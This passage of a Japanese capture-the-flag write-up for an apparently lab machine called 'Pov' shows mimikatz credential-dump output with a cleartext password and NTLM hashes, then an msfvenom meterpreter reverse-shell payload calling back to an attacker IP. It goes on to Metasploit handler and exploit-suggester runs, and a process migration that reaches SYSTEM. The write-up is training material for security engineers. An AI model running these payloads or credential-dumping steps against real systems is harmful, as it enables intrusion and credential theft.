* Domain : POV
* Password : (null)
ssp :
[00000000]
* Username : alaading
* Domain : (null)
* Password : f8gQ8fynP44ek1m3
credman :
Authentication Id : 0 ; 82775 (00000000:00014357)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/29/2024 9:02:31 PM
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :
* Username : POV$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : POV$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2/29/2024 9:02:30 PM
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : POV$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : pov$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52154 (00000000:0000cbba)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2/29/2024 9:02:29 PM
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 35319563 (00000000:021aef0b)
Session : Interactive from 0
User Name : alaading
Domain : POV
Logon Server : POV
Logon Time : 3/2/2024 4:47:52 AM
SID : S-1-5-21-2506154456-4081221362-271687478-1001
msv :
[00000003] Primary
* Username : alaading
* Domain : POV
* NTLM : 31c0583909b8349cbe92961f9dfa5dbf
* SHA1 : 3a8ce69bc0855496a9871aac1d4ba661a8fa0636
* DPAPI : 3a8ce69bc0855496a9871aac1d4ba661
tspkg :
wdigest :
* Username : alaading
* Domain : POV
* Password : (null)
kerberos :
* Username : alaading
* Domain : POV
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/29/2024 9:02:33 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/29/2024 9:02:32 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 85468 (00000000:00014ddc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2/29/2024 9:02:32 PM
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : POV$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 53314 (00000000:0000d042)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/29/2024 9:02:29 PM
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :
* Username : POV$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : POV$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2/29/2024 9:02:29 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : POV$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : pov$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz #
何もいいものがなかったです。token::elevateコマンドはローカル管理者権限がいるのでこの辺で打ち切って色々試します。
Metasploit
meterpreter
meterpreterセッションを作るために、ステージャを作ります。
┌──(root㉿kali)-[~/work]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.83 LPORT=4443 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
これをBOXで実行してhundlerでキャッチします。
┌──(root㉿kali)-[~/work]
└─# msfconsole
Metasploit tip: Set the current module's RHOSTS with database values using
hosts -R or services -R
`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`
=[ metasploit v6.3.55-dev ]
+ -- --=[ 2397 exploits - 1235 auxiliary - 422 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search multi/handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
4 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
5 exploit/multi/handler manual No Generic Payload Handler
6 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
7 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
8 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
Interact with a module by name or index. For example info 8, use 8 or use exploit/linux/local/yum_package_manager_persistence
msf6 >
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.83
LHOST => 10.10.14.83
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.83:4443
[*] Sending stage (201798 bytes) to 10.10.11.251
[*] Meterpreter session 1 opened (10.10.14.83:4443 -> 10.10.11.251:50099) at 2024-03-02 08:09:50 -0500
簡易にgetsystemしてみます。
meterpreter > getsystem
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter >
ダメですね。
local_exploit_suggester
簡易にExploitを提案してもらいます。
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search suggest
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service
1 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
2 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
3 auxiliary/scanner/http/nagios_xi_scanner normal No Nagios XI Scanner
4 post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration
5 post/osx/manage/sonic_pi normal No OS X Manage Sonic Pi
6 exploit/multi/http/torchserver_cve_2023_43654 2023-10-03 excellent Yes PyTorch Model Server Registration and Deserialization RCE
7 exploit/windows/http/sharepoint_data_deserialization 2020-07-14 excellent Yes SharePoint DataSet / DataTable Deserialization
8 exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow
Interact with a module by name or index. For example info 8, use 8 or use exploit/windows/smb/timbuktu_plughntcommand_bof
msf6 exploit(multi/handler) > use 2
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.11.251 - Collecting local exploits for x64/windows...
[*] 10.10.11.251 - 193 exploit checks are being tried...
[+] 10.10.11.251 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.251 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.11.251 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
4 exploit/windows/local/cve_2022_21882_win32k Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
6 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
7 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
8 exploit/windows/local/always_install_elevated No The target is not exploitable.
9 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
10 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable.
11 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
12 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
13 exploit/windows/local/bypassuac_sdclt No The target is not exploitable.
...省略
とりあえずYESで試してみます。
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_sluihijack
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sluihijack) > show options
Module options (exploit/windows/local/bypassuac_sluihijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/bypassuac_sluihijack) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/bypassuac_sluihijack) > set LHOST 10.10.14.83
LHOST => 10.10.14.83
msf6 exploit(windows/local/bypassuac_sluihijack) > run
[*] Started reverse TCP handler on 10.10.14.83:4444
[*] UAC is Enabled, checking level...
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_sluihijack) >
ダメっぽいです。
migrate
プロセス移動してみます。
親プロセスに移動してみます。
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
68 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
88 4 Registry x64 0
288 4 smss.exe x64 0
320 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
376 368 csrss.exe x64 0
480 368 wininit.exe x64 0
488 472 csrss.exe x64 1
496 1324 powershell.exe x64 0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
548 472 winlogon.exe x64 1 C:\Windows\System32\winlogon.exe
620 480 services.exe x64 0
...省略
3736 776 WmiPrvSE.exe x64 0 C:\Windows\System32\wbem\WmiPrvSE.exe
3840 1816 powershell.exe x64 0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3872 548 LogonUI.exe x64 1 C:\Windows\System32\LogonUI.exe
3900 848 chisel.exe x64 0 C:\Windows\Temp\chisel.exe
4000 1524 conhost.exe x64 0 C:\Windows\System32\conhost.exe
4288 1172 powershell.exe x64 0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4324 776 wsmprovhost.exe x64 0 POV\alaading C:\Windows\System32\wsmprovhost.exe
4360 3368 conhost.exe x64 0 POV\alaading C:\Windows\System32\conhost.exe
4644 1816 conhost.exe x64 0 C:\Windows\System32\conhost.exe
4660 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
4728 3312 cmd.exe x86 0 C:\Windows\SysWOW64\cmd.exe
4844 4288 runas.exe x64 0 C:\Windows\System32\runas.exe
4872 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
4908 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
4956 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
4964 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
5052 620 svchost.exe x64 0 C:\Windows\System32\svchost.exe
meterpreter >
776辺りに行ってみます。
meterpreter > migrate 776
[*] Migrating from 996 to 776...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
あれ、SYSTEM権限じゃん!
これでRootフラグが見えます。
まとめ
これで特権昇格に成功し、Administrator権限を奪取できました。
ラテラルムーブメントの引き出しが増えたので楽しいBOXでした!
今回もセキュリティエンジニアの皆さんの助けになればなと思います。